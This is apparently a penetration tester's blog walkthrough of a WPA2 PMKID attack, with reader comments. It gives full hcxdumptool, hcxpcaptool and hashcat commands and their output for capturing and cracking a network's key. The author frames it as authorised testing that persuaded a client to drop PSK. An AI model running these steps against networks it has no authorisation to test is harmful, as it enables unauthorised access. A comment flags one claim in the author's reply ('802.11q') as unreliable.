Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

PMKID - 20dBi Antenna

PMKID Attack Using Hcxdumptool and Hashcat

While it’s a bit older, I recently pulled off a PMKID attack and wanted to share the steps.

PMKID Attack – Introduction

If you’ve never heard of the PMKID attack, then I recommend reading the original hashcat post.

This is a client-less attack that doesn’t need a 4-way handshake or special output format.

For another walkthrough, you can also visit the following post.

Get Your NordVPN Offer Now!

YouTube Version of this Post

If you prefer a video over reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Targeting the Network

First, you will need to use hcxdumptool to capture the WLAN traffic. Note that not all drivers are working out of the box, but the following is a list of recommended chipsets.

  • USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
  • USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
  • USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
  • USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
  • USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Note that I performed this attack with a different card, but you will need to do some additional setup.

PMKID - Alfa AC1200

root@kali:~# lsusb
Bus 004 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

With my Alfa card in monitor mode, I was ready to begin.

root@kali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

First, I used airodump to grab the BSSID of my target network.

 CH  6 ][ Elapsed: 48 s ][ 2019-02-26 13:00                                         
                                                                                                          
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                       
                                                                                                          
 18:31:xx:xx:xx:xx  -67  17      266        0    0   6  130  WPA2 CCMP   PSK  TARGETNETWORK   

Once I obtained the BSSID, I added it to a filter file. While more than one BSSID can exist in this file, I was only targeting this specific network.

root@kali:~# echo "18xxxxxxxxxx" > myfilter.txt
Get Your NordVPN Offer Now!

Performing the Attack

With my filter in place, I could now use hcxdumptool to collect packets.

I was able to capture a PMKID hash very quickly, which was awesome!

root@kali:~# hcxdumptool -o capture.pcap -i wlan0 --enable_status=1 --filterlist=myfilter.txt --filtermode=2
initialization...

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: dc701431xxxx
MAC ACCESS POINT.........: 48f317b472b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65198
ANONCE...................: 7281156220ed9e68c9f974df2f98d10b7c800270b49e1004ad5dc1ad3e2662b0

[13:07:58 - 006] 1831xxxxxxxx -> a04ea7a4xxxx [FOUND PMKID]

Next, I used hcxpcaptool to convert the hash into a usable format.

root@kali:~# hcxpcaptool -z pmkid_hash.txt capture.pcap 

reading from capture.pcap
                                                
summary:                                        
--------
file name....................: capture.pcap
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.19.0-kali1-686-pae
file application information.: hcxdumptool 5.1.3
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 88
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 88
beacons (with ESSID inside)..: 9
probe requests...............: 14
probe responses..............: 11
association requests.........: 7
association responses........: 7
authentications (OPEN SYSTEM): 38
authentications (BROADCOM)...: 22
authentications (APPLE)......: 4
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to pmkid_hash.txt

Cracking the Hash

To crack these hashes using hashcat, you will need at least version 4.2.0.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat --version
v4.2.1

After verifying that I had an updated version, I started to crack the hash.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -r ~/tools/cracking/best64.rule pmkid_hash.txt ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxx*1831xxxxxxxx*axxxx...6xxxxx
Time.Started.....: Tue Feb 26 14:17:20 2019 (28 secs)
Time.Estimated...: Tue Feb 26 18:57:06 2019 (4 hours, 39 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5477 H/s (7.38ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Speed.Dev.#3.....:    59229 H/s (8.04ms) @ Accel:32 Loops:16 Thr:256 Vec:1
Speed.Dev.#*.....:    64706 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20165670/1104517568 (1.83%)
Rejected.........: 18445350/20165670 (91.47%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> Iloveyou85
Candidates.#3....: iloveyou348 -> footiecrazy8

Unfortunately, I was unable to crack the hash in this specific scenario. That said, I was able to prove the vulnerability and convince them to switch away from PSK.

In light of a fun screenshot of me able to connect, I give you a picture of my co-worker’s awesome Tupavco TP511 WiFi Panel antenna

PMKID - 20dBi Antenna

I also wanted to point out that cracking the PMKID hashes is around twice as fast as standard EAPOL packets! This makes the attack even more enticing, as WPA2 is a notoriously slow algorithm.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6631 H/s (53.86ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    59876 H/s (66.06ms) @ Accel:128 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    66507 H/s

Started: Thu Feb 28 16:05:21 2019
Stopped: Thu Feb 28 16:05:31 2019
Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 2500 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6634 H/s (53.85ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    26169 H/s (75.92ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    32803 H/s

Started: Thu Feb 28 16:05:36 2019
Stopped: Thu Feb 28 16:05:44 2019
Get Your NordVPN Offer Now!

PMKID Attack – Conclusion

While I wasn’t able to perform a complete compromise, this was still an awesome attack to do. I definitely plan on using, as well as researching, it further.

Note that EAPHammer can also do this attack, and I may share a post with that technique as well.

If you have any other suggestions for wireless gear or techniques that I should try, then please reach out!

12 Comments

  1. Ray – Seemoo labs recently released firmware patching project for Broadcom wireless chipsets (most notably the ones in the R-Pi3B) that enables monitor mode and frame injection. I just pulled this off on one of my R-pi’s and it works beautifully! Next step will be to apply this to a Pi-Zero. Being able to run wireless pentest without the external card is a huge advantage for me; thought you may be interested. Here’s their github link.
    https://github.com/seemoo-lab/nexmon

    • Woah, this is awesome! I carry a Pi3B or a Pi0W around as my primary kit now, but have been utilizing an external card. Being able to make the form factor even smaller is definitely intriguing.

      I still have to finish some write-ups, but I’ve been using the Panda cards and a 3d printed case most recently, to hold the 10k Ankers.

  2. Hey, I found your guide and just seeing If you can help me figure out what I might be doing wrong.(because I can never get this to fully work.) I use an Alfa AWUS036H which works great for its age. I put my card into ‘monitor mode’ which goes from wlan0 to wlan0mon.

    Once I get to this point:’hcxdumptool -o capture.pcap -i wlanO –enable_status=1 –filterlist=myfilter.txt –filtermode=2′ Is the ‘wlanO a (upper case O or number zero?)

    Also, did you put the wifi back out of monitor mode before you run that?

    I have to run it on my side with “hcxdumptool -o capture.pcap -i wlan0mon –enable_status=1 –filterlist=myfilter.txt –filtermode=2’.
    Then I get hit with this error: “Warning: wlan0mon is probably a monitor interface”

    Using ‘wlan0 or wlanO’ will not work. I have tried to run it many different ways, with different guides and I have no clue what I’m doing wrong. I’m running hcxdumptool version 5.1.4 too. Appreciate any help. thanks

    • The -i flag is for interface, so you will want to use wlan0 (zero), or whatever your interface is currently set.

      Additionally, you do not want to be in monitor mode for this attack, so you’d use wlan0 and managed mode. wlan0 will not work if the interface is currently called wlan0mon (even if it is not in monitor mode).

  3. I’m guessing you didn’t want to help, seeing that my question was never posted.(which is OK). More testing on an old router pulled the pmkid without errors….mostly. Maybe Kali doesn’t like my alfa wireless card..not enough power?? Who the hell knows. They don’t make it clear on how the switching of networks go as far as monitor mode and what not. Guess it’s time for a new wireless card. If anything thanks for the guide. Delete this post if you like.

    • Haha, I have to manually approve posts to prevent spam, and you only posted it last night.

      The AWUS036H should work fine, but it definitely has a high power consumption. What do you mean as far as switching of networks and monitor mode is concerned though?

      • Sorry! It just appeared on my side that the messages were deleted. The switching of networks, I think you answered with the other reply to my message. I was just confused on if I manually needed to switch out of monitor mode or not, for certain parts of this attack.

        From reading it over again, It appears you set the wifi card into monitor mode for the Airodump-ng session (to find the network) then set it back to managed mode afterwards (back to wlan0), to run the hcxdumptool command with wlan0. (I hope I got that right haha) I think it finally makes sense now though.

        I think I might be a little to far to grab the pmkid from certain routers, or maybe the router just doesn’t accept that type of attack. Thank you

        • Yea, you want to not be in monitor mode when attempting the attack.

          The router might not be vulnerable to the attack. This will work against all 802.11i/p/q/r networks with roaming functions enabled. If your router doesn’t support that, then you will not be able to successfully grab the PMKID hash.

  4. Pretty sure 802.11q is not a thing. In the post you linked (page 3 or so of comments) ZerBea mentions this was added just to see who copys and pastes information lulz

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.